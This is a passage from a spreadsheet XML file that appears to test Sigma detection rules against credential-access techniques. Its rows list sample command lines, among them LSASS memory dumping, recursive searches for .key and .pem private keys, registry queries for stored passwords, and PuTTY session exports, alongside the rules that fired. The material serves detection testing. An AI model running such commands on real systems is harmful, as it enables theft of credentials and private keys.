          <t>t1552.004</t>
        </is>
      </c>
      <c r="B706" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C706" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D706" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E706" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Process -Name lsass | Out-Minidump"</t>
        </is>
      </c>
      <c r="F706" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G706" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I706" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J706" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K706" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B707" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C707" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D707" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E707" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Process lsass | Out-Minidump"</t>
        </is>
      </c>
      <c r="F707" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I707" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS (b2815d0d-7481-4bf0-9b6c-a4c48a94b349); PowerShell Get-Process LSASS (b2815d0d-7481-4bf0-9b6c-a4c48a94b349); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J707" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K707" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B708" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C708" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D708" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E708" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /b /s .key | findstr /e .key</t>
        </is>
      </c>
      <c r="F708" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I708" s="43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J708" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K708" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B709" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C709" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D709" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E709" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /b /s .key | findstr ".key$"</t>
        </is>
      </c>
      <c r="F709" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I709" s="43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J709" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K709" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B710" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C710" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D710" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E710" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /b /s .key | findstr /e ".key"</t>
        </is>
      </c>
      <c r="F710" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I710" s="43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J710" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K710" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B711" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C711" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D711" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E711" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path C:\ -Recurse -Include *.key"</t>
        </is>
      </c>
      <c r="F711" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I711" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J711" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K711" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B712" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C712" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D712" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E712" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path C:\ -Recurse -Include *.key"</t>
        </is>
      </c>
      <c r="F712" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I712" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J712" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K712" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B713" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C713" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D713" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E713" s="43" t="inlineStr">
        <is>
          <t>findstr /e .key</t>
        </is>
      </c>
      <c r="F713" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I713" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J713" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K713" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B714" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C714" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D714" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E714" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /b /s .pem | findstr /e .pem</t>
        </is>
      </c>
      <c r="F714" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I714" s="43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J714" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K714" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B715" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C715" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D715" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E715" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c dir c:\ /b /s .pem | findstr ".pem$"</t>
        </is>
      </c>
      <c r="F715" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I715" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e); Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e); Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e); File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006); File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J715" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K715" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B716" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C716" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D716" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E716" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path C:\ -Recurse -Include *.pem"</t>
        </is>
      </c>
      <c r="F716" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I716" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J716" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K716" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B717" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C717" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D717" s="43" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E717" s="43" t="inlineStr">
        <is>
          <t>reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /f password</t>
        </is>
      </c>
      <c r="F717" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G717" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I717" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J717" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K717" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B718" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C718" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D718" s="43" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E718" s="43" t="inlineStr">
        <is>
          <t>reg.exe query HKCU /f password /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F718" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I718" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J718" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K718" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B719" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C719" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D719" s="43" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E719" s="43" t="inlineStr">
        <is>
          <t>reg query HKLM /f password /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F719" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I719" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J719" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K719" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B720" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C720" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D720" s="43" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E720" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY\Sessions /f password</t>
        </is>
      </c>
      <c r="F720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I720" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J720" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K720" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B721" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C721" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D721" s="43" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E721" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F721" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I721" s="43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J721" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K721" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B722" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C722" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D722" s="43" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E722" s="43" t="inlineStr">
        <is>
          <t>reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F722" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I722" s="43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J722" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K722" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B723" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C723" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D723" s="43" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E723" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s /t REG_SZ</t>
        </is>
      </c>
      <c r="F723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I723" s="43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J723" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K723" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B724" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C724" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D724" s="43" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E724" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ</t>
        </is>
      </c>
      <c r="F724" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I724" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J724" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K724" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B725" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C725" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D725" s="43" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E725" s="43" t="inlineStr">
        <is>
          <t>reg.exe export "HKCU\Software\SimonTatham\PuTTY\Sessions" C:\temp\p.reg</t>
        </is>
      </c>
      <c r="F725" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I725" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J725" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K725" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B726" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C726" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D726" s="43" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E726" s="43" t="inlineStr">
        <is>
          <t>reg export HKCU\Software\SimonTatham\PuTTY\Sessions C:\temp\p.reg</t>
        </is>
      </c>
      <c r="F726" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I726" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J726" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K726" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B727" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C727" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D727" s="43" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E727" s="43" t="inlineStr">
        <is>
          <t>reg.exe  export  HKCU\Software\SimonTatham\PuTTY\Sessions  C:\temp\p.reg</t>
        </is>
      </c>
      <c r="F727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I727" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J727" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K727" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B728" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C728" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D728" s="43" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E728" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software\SimonTatham\PuTTY\Sessions C:\temp\p.reg</t>
        </is>
      </c>
      <c r="F728" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I728" s="43" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J728" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K728" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B729" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C729" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D729" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E729" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\rundll32.exe keymgr,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F729" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I729" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access (a4694263-59a8-4608-a3a0-6f8d3a51664c); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J729" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K729" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B730" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C730" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D730" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E730" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe keymgr,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F730" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I730" s="43" t="inlineStr">
        <is>
